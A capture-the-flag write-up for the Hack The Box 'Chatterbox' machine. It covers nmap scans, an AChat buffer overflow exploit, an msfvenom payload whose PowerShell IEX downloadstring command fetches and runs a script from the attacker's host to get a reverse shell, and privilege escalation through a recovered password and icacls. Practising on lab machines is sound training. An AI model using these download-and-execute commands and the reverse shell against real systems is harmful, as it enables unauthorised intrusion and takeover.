ChatterBox HTB - WriteUP
Chatterbox
Information Gathering
Nmap Recon Results
we begin identifiyng the Os System in our targeted machine
Nmap Recon Open Ports
Well now we will identify the possible open ports on the server to have a clearer idea about what services run on it
nmap -sS --min-rate 5000 -p- --open -n 10.129.40.4 -Pn -vvvv
as can see only have 2 open ports we will investigate what they are about.
Service and version detection
nmap -sC -sV -p 9255-9256 10.129.40.4 -n -oN targeted
Okay, now I had a little something to go on. I hit the discovered services with a version scan to obtain more information:
A little bit of research told me that https://sourceforge.net/projects/achat/ is a freeware solution for conducting instant messaging and file sharing across a LAN. A little bit more research told me that some versions of it are vulnerable to a remote buffer overflow attack.
vulnerability identification
searchsploit achat
Exploit Db Link
https://www.exploit-db.com/exploits/36025
we will modify our exploit code with in the following lines and change for the direccion and port to the server
with the intention to gain access to the system we need create a payload with msfvenom with the follow instruccion to execute a powershell command to make a get request and execute that code in memory
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.35:80/shell.ps1')" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f py
Exploit Invoke-Powershell-Tcp.ps1
now we share the file “Invoke-PowershellTcp.ps1” from nishang repository so that the server finds the resource that we specify in our payload, and we can obtain the reverse connection. But before that, we will first modify our shell.ps1 script so that after the code has been loaded into memory on the server side, it executes the following instruction
how as can see from the server side a GET request is sent to our http in python server and we obtain a reverse conection
Privilege Escalation
Method I
System Enumeration enumerating the system we note that we do not have privilege tokens that we could abuse.
Active Connections
we list all active conections on the servers to obtain more information, In the event that we run out of options to gain privileges, we will investigate more about what we can find
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 704
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 360
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 792
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 920
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 452
TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING 476
TCP 10.129.40.4:139 0.0.0.0:0 LISTENING 4
TCP 10.129.40.4:9255 0.0.0.0:0 LISTENING 5380
TCP 10.129.40.4:9256 0.0.0.0:0 LISTENING 5380
TCP 10.129.40.4:49158 10.10.14.35:443 ESTABLISHED 460
to list the system we will use the Powerup script, to identify possible ways of exploitation to gain privileges
Credentials :
Alfred : Welcome1!
now we have a valid credentials so we could try to reuse that credential with other users
#(proving that we can start processes)
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.35/shell.ps1')"
#(Save our Password)
$Secpass = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
#(Generating Credentials object)
$cred = New-Object System.Management.Automation.PSCredential('Administrator',$Secpass)
Token Privileges like Administrator user
we can use common exploits like juicy potato.
Method II
Checking Acl Administrator
Get-Acl | FL *
We can see that we have full permissions in the “C:\Users\Administrator\Desktop” directory, which means that we can take advantage of that to give ourselves the permissions to modify, execute or read files in said directory
icacls root.txt /T /grant alfred:F
now we have full control of the file “root.txt” so we can read,modify or execute the file what ever our want